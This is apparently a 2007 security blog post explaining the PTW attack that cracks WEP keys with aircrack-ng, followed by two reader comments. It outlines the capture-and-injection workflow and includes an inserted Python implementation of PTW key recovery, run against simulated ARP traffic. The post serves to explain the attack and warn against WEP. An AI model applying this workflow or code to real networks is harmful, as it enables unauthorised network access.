base under attack
ethical hacking, penetration testing, IT security and other news

Breaking WEP in under 60 seconds

It has been trivial to break WEP for years. Automated tools that combine statistical attacks on RC4 (the FMS and KoreK attacks) with traffic injection crack WEP keys of either length (40-bit, and the 104-bit keys marketed as "128-bit" WEP, which this post also calls 108-bit) on an average laptop or desktop in a matter of hours.

Now it is even more of a joke. A new attack, called PTW (after Pyshkin, Tews and Weinmann), has been shown to recover a 104-bit key from as few as 40,000 captured frames with known plaintext (a 50% success rate; about 85,000 frames give 95%). Because ARP packets supply that plaintext and can be replayed by injection, the traffic is gathered in minutes rather than hours. If you're still using WEP, stop. Now.

The PTW attack is implemented in aircrack-ng 0.9 and later; new versions can be downloaded from the aircrack-ng website. BackTrack 2 ships an older aircrack-ng, so you will need to upgrade, either by compiling from source or by installing the latest Slax module (a development build, but it usually works well).

Breaking a key with PTW works much like the older attacks: gather a capture with airodump-ng, inject traffic with aireplay-ng to speed things up (if necessary), and feed the capture files to aircrack-ng. There are a few differences:

1. PTW gives up quickly when there are not enough IVs, instead of grinding on indefinitely like the older methods (which in that situation have little chance of finding the key). When aircrack-ng is reading a capture that airodump-ng is still writing, it retries automatically every 5,000 additional IVs rather than tying up the CPU in between.

2. PTW needs full packet captures. It derives keystream bytes from known plaintext in the packet body (the LLC/SNAP and ARP headers), so IV-only files (.ivs, as written by airodump-ng --ivs) are not currently supported.

3. In aircrack-ng 0.9.x you must pass -z to select the PTW attack. In the 1.0 development versions PTW is the default (and -K selects the older KoreK attacks instead).

I’ve tested the PTW attack on my access point at home, and it was able to retrieve a 108-bit key with about 50,000 IVs. Injecting the traffic using aireplay-ng’s ARP attack took only a few minutes. 40-bit keys can be done even faster.
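To make the points above concrete (why PTW wants full frames with known plaintext, and why tens of thousands of IVs are enough), here is a self-contained simulation of the PTW vote. It is an added example, not code from this post or from aircrack-ng. It encrypts constructed ARP requests under random IVs, recovers the first 16 keystream bytes by XORing with the fixed LLC/SNAP + ARP header, and turns every frame into one vote per partial key sum sigma_i = K[3] + ... + K[3+i] using the PTW approximation of Klein's formula (only the three IV-driven KSA rounds are run per frame). The key-ranking step is a simplified stand-in (top candidates per sigma, combinations verified against one frame), not aircrack-ng's ranking; the 40-bit root key, the 80,000-frame count and the seeds are choices made so the pure-Python run finishes in seconds. The same voting code handles 13-byte keys, but then a real ranking strategy is needed because exhaustive combination of the top candidates no longer fits.

```python
"""Simulated PTW attack on WEP (added example; not from the post or aircrack-ng).

Each frame leaks the public 3-byte IV and, since the first 16 plaintext bytes
of an ARP frame are fixed, the first 16 RC4 keystream bytes.  The right value
of each sigma_i attracts ~1.3/256 of the votes instead of 1/256.
"""
import itertools
import random

# LLC/SNAP header + start of an ARP request (hw type 1, IPv4, hlen 6, plen 4,
# opcode 1): the known plaintext that ARP-based PTW cracking relies on.
KNOWN_PLAINTEXT = bytes.fromhex("aaaa0300000008060001080006040001")


def rc4_keystream(key, length):
    """Plain RC4 (KSA then PRGA).  WEP uses key = IV || root key."""
    S = list(range(256))
    klen = len(key)
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def make_wep_frames(root_key, count, seed):
    """Constructed traffic: (IV, first 16 ciphertext bytes) of encrypted ARP
    requests under random IVs, i.e. what airodump-ng would capture."""
    rng = random.Random(seed)
    frames = []
    for _ in range(count):
        iv = bytes(rng.randrange(256) for _ in range(3))
        ks = rc4_keystream(iv + root_key, 16)
        frames.append((iv, bytes(p ^ k for p, k in zip(KNOWN_PLAINTEXT, ks))))
    return frames


def ptw_votes(frames, keylen):
    """votes[i][v] = number of frames voting v for sigma_i.

    With X the keystream (X[0] = first PRGA output) and S3, j3 the KSA state
    after the three rounds driven by the IV, the PTW vote is
        A_i = S3inv[(3+i) - X[2+i]] - (j3 + S3[3] + ... + S3[3+i])  (mod 256)
    """
    votes = [[0] * 256 for _ in range(keylen)]
    for iv, ct in frames:
        ks = [c ^ p for c, p in zip(ct, KNOWN_PLAINTEXT)]
        S = list(range(256))
        j = 0
        touched = [0, 1, 2]          # positions that may differ from identity
        for i in range(3):           # only the IV-driven KSA rounds
            j = (j + S[i] + iv[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
            touched.append(j)
        S_inv = list(range(256))     # cheap inverse: fix up touched slots only
        for p in touched:
            S_inv[S[p]] = p
        acc = j                      # j3 ...
        for i in range(keylen):
            acc = (acc + S[3 + i]) & 0xFF     # ... + S3[3] + ... + S3[3+i]
            a = (S_inv[(3 + i - ks[2 + i]) & 0xFF] - acc) & 0xFF
            votes[i][a] += 1
    return votes


def recover_key(frames, keylen, depth=4):
    """Take the 'depth' best candidates per sigma_i and verify every
    combination against one frame (simplified ranking). Root key or None."""
    votes = ptw_votes(frames, keylen)
    ranked = [sorted(range(256), key=row.__getitem__, reverse=True)[:depth]
              for row in votes]
    iv, ct = frames[0]
    for sigmas in itertools.product(*ranked):
        # K[3+i] = sigma_i - sigma_(i-1)
        key = bytes((sigmas[i] - (sigmas[i - 1] if i else 0)) & 0xFF
                    for i in range(keylen))
        ks = rc4_keystream(iv + key, 16)
        if bytes(c ^ k for c, k in zip(ct, ks)) == KNOWN_PLAINTEXT:
            return key
    return None


def demo(keylen=5, frame_count=80000, seed=2007):
    """Crack a random 40-bit root key from constructed traffic; returns
    (true_key, recovered_key).  Seeds and sizes are arbitrary choices."""
    rng = random.Random(seed)
    root_key = bytes(rng.randrange(256) for _ in range(keylen))
    frames = make_wep_frames(root_key, frame_count, seed + 1)
    return root_key, recover_key(frames, keylen)


if __name__ == "__main__":
    true_key, found = demo()
    print("root key :", true_key.hex())
    print("recovered:", found.hex() if found else None)
```

Note that nothing beyond the IV and the 16 known bytes is used, and that the per-frame work is three KSA rounds plus a handful of table lookups, which is why aircrack-ng can evaluate tens of thousands of frames almost instantly once they are on disk.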

2 Responses to “Breaking WEP in under 60 seconds”

  1. It is nice, but it would have been better if you specified the method to collect IVs using the aircrack ARP attack.

    bughira - September 9th, 2007 at 4:12 am

  2. Injecting the ARP traffic is very simple using aireplay-ng. There is a lot of information on the aircrack-ng website. This article assumes some prior knowledge of WEP attacks; it is not meant to be a step-by-step tutorial.

    Johann - September 12th, 2007 at 4:13 pm
